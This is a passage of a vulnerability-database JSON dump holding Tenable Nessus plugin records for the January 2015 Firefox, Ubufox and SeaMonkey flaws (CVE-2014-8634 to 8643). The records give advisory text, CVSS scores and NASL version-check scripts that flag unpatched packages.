script_dependencies(\"macosx_firefox_installed.nasl\");\n script_require_keys(\"MacOSX/Firefox/Installed\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = \"MacOSX/Firefox\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nif (get_kb_item(kb_base + '/is_esr')) exit(0, 'The Mozilla Firefox installation is in the ESR branch.');\n\nmozilla_check_version(product:'firefox', version:version, path:path, esr:FALSE, fix:'35.0', severity:SECURITY_HOLE, xss:FALSE, xsrf:TRUE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:30", "description": "Christian Holler, Patrick McManus, Christoph Diehl, Gary Kwong, Jesse Ruderman, Byron Campen, Terrence Cole, and Nils Ohlmeier discovered multiple memory safety issues in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2014-8634, CVE-2014-8635)\n\nBobby Holley discovered that some DOM objects with certain properties can bypass XrayWrappers in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to bypass security restrictions.\n(CVE-2014-8636)\n\nMichal Zalewski discovered a use of uninitialized memory when rendering malformed bitmap images on a canvas element. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to steal confidential information.\n(CVE-2014-8637)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon() lack an origin header. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to conduct cross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response could inject cookies in to the originally requested domain. If a user connected to a malicious web proxy, an attacker could potentially exploit this to conduct session-fixation attacks. (CVE-2014-8639)\n\nHolger Fuhrmannek discovered a crash in Web Audio while manipulating timelines. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service. (CVE-2014-8640)\n\nMitchell Harper discovered a use-after-free in WebRTC. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2014-8641)\n\nBrian Smith discovered that OCSP responses would fail to verify if signed by a delegated OCSP responder certificate with the id-pkix-ocsp-nocheck extension, potentially allowing a user to connect to a site with a revoked certificate. (CVE-2014-8642).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-01-15T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : firefox vulnerabilities (USN-2458-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:firefox", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10"], "id": "UBUNTU_USN-2458-1.NASL", "href": "https://www.tenable.com/plugins/nessus/80548", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2458-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80548);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\", \"CVE-2014-8642\");\n script_bugtraq_id(72041, 72042, 72044, 72045, 72046, 72047, 72048, 72049, 72050);\n script_xref(name:\"USN\", value:\"2458-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : firefox vulnerabilities (USN-2458-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Christian Holler, Patrick McManus, Christoph Diehl, Gary Kwong, Jesse\nRuderman, Byron Campen, Terrence Cole, and Nils Ohlmeier discovered\nmultiple memory safety issues in Firefox. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit these to cause a denial of service via application crash, or\nexecute arbitrary code with the privileges of the user invoking\nFirefox. (CVE-2014-8634, CVE-2014-8635)\n\nBobby Holley discovered that some DOM objects with certain properties\ncan bypass XrayWrappers in some circumstances. If a user were tricked\nin to opening a specially crafted website, an attacker could\npotentially exploit this to bypass security restrictions.\n(CVE-2014-8636)\n\nMichal Zalewski discovered a use of uninitialized memory when\nrendering malformed bitmap images on a canvas element. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to steal confidential information.\n(CVE-2014-8637)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon()\nlack an origin header. If a user were tricked in to opening a\nspecially crafted website, an attacker could potentially exploit this\nto conduct cross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response\ncould inject cookies in to the originally requested domain. If a user\nconnected to a malicious web proxy, an attacker could potentially\nexploit this to conduct session-fixation attacks. (CVE-2014-8639)\n\nHolger Fuhrmannek discovered a crash in Web Audio while manipulating\ntimelines. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial\nof service. (CVE-2014-8640)\n\nMitchell Harper discovered a use-after-free in WebRTC. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via application\ncrash, or execute arbitrary code with the privileges of the user\ninvoking Firefox. (CVE-2014-8641)\n\nBrian Smith discovered that OCSP responses would fail to verify if\nsigned by a delegated OCSP responder certificate with the\nid-pkix-ocsp-nocheck extension, potentially allowing a user to connect\nto a site with a revoked certificate. (CVE-2014-8642).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2458-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"firefox\", pkgver:\"35.0+build3-0ubuntu0.12.04.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"firefox\", pkgver:\"35.0+build3-0ubuntu0.14.04.2\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"firefox\", pkgver:\"35.0+build3-0ubuntu0.14.10.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:24", "description": "USN-2458-1 fixed vulnerabilities in Firefox. This update provides the corresponding version of Ubufox.\n\nChristian Holler, Patrick McManus, Christoph Diehl, Gary Kwong, Jesse Ruderman, Byron Campen, Terrence Cole, and Nils Ohlmeier discovered multiple memory safety issues in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2014-8634, CVE-2014-8635)\n\nBobby Holley discovered that some DOM objects with certain properties can bypass XrayWrappers in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to bypass security restrictions. (CVE-2014-8636)\n\nMichal Zalewski discovered a use of uninitialized memory when rendering malformed bitmap images on a canvas element.\nIf a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to steal confidential information. (CVE-2014-8637)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon() lack an origin header. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to conduct cross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response could inject cookies in to the originally requested domain. If a user connected to a malicious web proxy, an attacker could potentially exploit this to conduct session-fixation attacks. (CVE-2014-8639)\n\nHolger Fuhrmannek discovered a crash in Web Audio while manipulating timelines. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service. (CVE-2014-8640)\n\nMitchell Harper discovered a use-after-free in WebRTC. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox.\n(CVE-2014-8641)\n\nBrian Smith discovered that OCSP responses would fail to verify if signed by a delegated OCSP responder certificate with the id-pkix-ocsp-nocheck extension, potentially allowing a user to connect to a site with a revoked certificate. (CVE-2014-8642).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-01-15T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : ubufox update (USN-2458-2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:xul-ext-ubufox", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10"], "id": "UBUNTU_USN-2458-2.NASL", "href": "https://www.tenable.com/plugins/nessus/80549", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2458-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80549);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\", \"CVE-2014-8642\");\n script_bugtraq_id(72041, 72042, 72044, 72045, 72046, 72047, 72048, 72049, 72050);\n script_xref(name:\"USN\", value:\"2458-2\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : ubufox update (USN-2458-2)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-2458-1 fixed vulnerabilities in Firefox. This update provides the\ncorresponding version of Ubufox.\n\nChristian Holler, Patrick McManus, Christoph Diehl, Gary Kwong, Jesse\nRuderman, Byron Campen, Terrence Cole, and Nils Ohlmeier discovered\nmultiple memory safety issues in Firefox. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit these to cause a denial of service via application crash, or\nexecute arbitrary code with the privileges of the user invoking\nFirefox. (CVE-2014-8634, CVE-2014-8635)\n\nBobby Holley discovered that some DOM objects with certain\nproperties can bypass XrayWrappers in some circumstances. If\na user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to\nbypass security restrictions. (CVE-2014-8636)\n\nMichal Zalewski discovered a use of uninitialized memory\nwhen rendering malformed bitmap images on a canvas element.\nIf a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to steal\nconfidential information. (CVE-2014-8637)\n\nMuneaki Nishimura discovered that requests from\nnavigator.sendBeacon() lack an origin header. If a user were\ntricked in to opening a specially crafted website, an\nattacker could potentially exploit this to conduct\ncross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407\nresponse could inject cookies in to the originally requested\ndomain. If a user connected to a malicious web proxy, an\nattacker could potentially exploit this to conduct\nsession-fixation attacks. (CVE-2014-8639)\n\nHolger Fuhrmannek discovered a crash in Web Audio while\nmanipulating timelines. If a user were tricked in to opening\na specially crafted website, an attacker could potentially\nexploit this to cause a denial of service. (CVE-2014-8640)\n\nMitchell Harper discovered a use-after-free in WebRTC. If a\nuser were tricked in to opening a specially crafted website,\nan attacker could potentially exploit this to cause a denial\nof service via application crash, or execute arbitrary code\nwith the privileges of the user invoking Firefox.\n(CVE-2014-8641)\n\nBrian Smith discovered that OCSP responses would fail to\nverify if signed by a delegated OCSP responder certificate\nwith the id-pkix-ocsp-nocheck extension, potentially\nallowing a user to connect to a site with a revoked\ncertificate. (CVE-2014-8642).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2458-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xul-ext-ubufox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xul-ext-ubufox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"xul-ext-ubufox\", pkgver:\"3.0-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"xul-ext-ubufox\", pkgver:\"3.0-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"xul-ext-ubufox\", pkgver:\"3.0-0ubuntu0.14.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xul-ext-ubufox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-18T15:17:34", "description": "Versions of Mozilla Firefox earlier than 35.0 are unpatched for the following vulnerabilities : \n\n - Multiple unspecified memory safety issues exist within the browser engine. (CVE-2014-8634, CVE-2014-8635)\n - A flaw exists where DOM objects with some specific properties can bypass XrayWrappers. This can allow web content to confuse privileged code, potentially enabling privilege escalation. (CVE-2014-8636)\n - A flaw exists in the rendering of bitmap images. When rending a malformed bitmap image, memory may not always be properly initialized, which can result in a leakage of data to web content. (CVE-2014-8637)\n - A flaw exists in 'navigator.sendBeacon()' in which it does not follow the cross-origin resource sharing specification. This results in requests from 'sendBeacon()' lacking an 'origin' header, which allows malicious sites to perform XSRF attacks. (CVE-2014-8638)\n - A flaw exists when receiving 407 Proxy Authentication responses with a 'set-cookie' header. This can allow a session-fixation attack. (CVE-2014-8639)\n - A flaw exists in Web Audio that can allow a small block of memory to be read. (CVE-2014-8640)\n - A read-after-free flaw exists in WebRTC due to the way tracks are handled, which can result in a potentially exploitable crash or incorrect WebRTC behavior. (CVE-2014-8641)\n - A flaw exists where delegated Online Certificate Status Protocol responder certificates fail to recognize the id-pkix-ocsp-nocheck extension. This can result in a user connecting to a site with a revoked certificate. (CVE-2014-8642)\n - A flaw exists in the Gecko Media Plugin which can allow an attacker to break out of the sandbox. (CVE-2014-8643)", "cvss3": {}, "published": "2015-01-16T00:00:00", "type": "nessus", "title": "Mozilla Firefox < 35.0 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642", "CVE-2014-8643"], "modified": "2019-11-06T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "8624.PRM", "href": "https://www.tenable.com/plugins/nnm/8624", "sourceData": "Binary data 8624.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-17T23:48:13", "description": "Versions of Mozilla Firefox ESR prior to 31.4 are unpatched for the following vulnerabilities : \n\n - Multiple unspecified memory safety issues exist within the browser engine. (CVE-2014-8634, CVE-2014-8635)\n - A flaw exists where DOM objects with some specific properties can bypass XrayWrappers. This can allow web content to confuse privileged code, potentially enabling privilege escalation. (CVE-2014-8636)\n - A flaw exists in the rendering of bitmap images. When rending a malformed bitmap image, memory may not always be properly initialized, which can result in a leakage of data to web content. (CVE-2014-8637)\n - A flaw exists in 'navigator.sendBeacon()' in which it does not follow the cross-origin resource sharing specification. This results in requests from 'sendBeacon()' lacking an 'origin' header, which allows malicious sites to perform XSRF attacks. (CVE-2014-8638)\n - A flaw exists when receiving 407 Proxy Authentication responses with a 'set-cookie' header. This can allow a session-fixation attack. (CVE-2014-8639)\n - A flaw exists in Web Audio that can allow a small block of memory to be read. (CVE-2014-8640)\n - A read-after-free flaw exists in WebRTC due to the way tracks are handled, which can result in a potentially exploitable crash or incorrect WebRTC behavior. (CVE-2014-8641)\n - A flaw exists where delegated Online Certificate Status Protocol responder certificates fail to recognize the id-pkix-ocsp-nocheck extension. This can result in a user connecting to a site with a revoked certificate. (CVE-2014-8642)\n - A flaw exists in the Gecko Media Plugin which can allow an attacker to break out of the sandbox. (CVE-2014-8643)", "cvss3": {}, "published": "2019-11-06T00:00:00", "type": "nessus", "title": "Mozilla Firefox ESR < 31.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642", "CVE-2014-8643"], "modified": "2019-11-06T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "701250.PRM", "href": "https://www.tenable.com/plugins/nnm/701250", "sourceData": "Binary data 701250.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:09", "description": "Mozilla seamonkey was updated to SeaMonkey 2.32 (bnc#910669)\n\n - MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous memory safety hazards\n\n - MFSA 2015-02/CVE-2014-8637 (bmo#1094536) Uninitialized memory use during bitmap rendering\n\n - MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an Origin header\n\n - MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through Proxy Authenticate responses\n\n - MFSA 2015-05/CVE-2014-8640 (bmo#1100409) Read of uninitialized memory in Web Audio\n\n - MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free in WebRTC\n\n - MFSA 2015-07/CVE-2014-8643 (bmo#1114170) (Windows-only) Gecko Media Plugin sandbox escape\n\n - MFSA 2015-08/CVE-2014-8642 (bmo#1079658) Delegated OCSP responder certificates failure with id-pkix-ocsp-nocheck extension\n\n - MFSA 2015-09/CVE-2014-8636 (bmo#987794) XrayWrapper bypass through DOM objects\n\n - use GStreamer 1.0 from 13.2 on", "cvss3": {}, "published": "2015-02-03T00:00:00", "type": "nessus", "title": "openSUSE Security Update : seamonkey (openSUSE-SU-2015:0192-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642", "CVE-2014-8643"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:seamonkey", "p-cpe:/a:novell:opensuse:seamonkey-debuginfo", "p-cpe:/a:novell:opensuse:seamonkey-debugsource", "p-cpe:/a:novell:opensuse:seamonkey-dom-inspector", "p-cpe:/a:novell:opensuse:seamonkey-irc", "p-cpe:/a:novell:opensuse:seamonkey-translations-common", "p-cpe:/a:novell:opensuse:seamonkey-translations-other", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-92.NASL", "href": "https://www.tenable.com/plugins/nessus/81142", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-92.\n#\n# The text description of this plugin is (C) SUSE 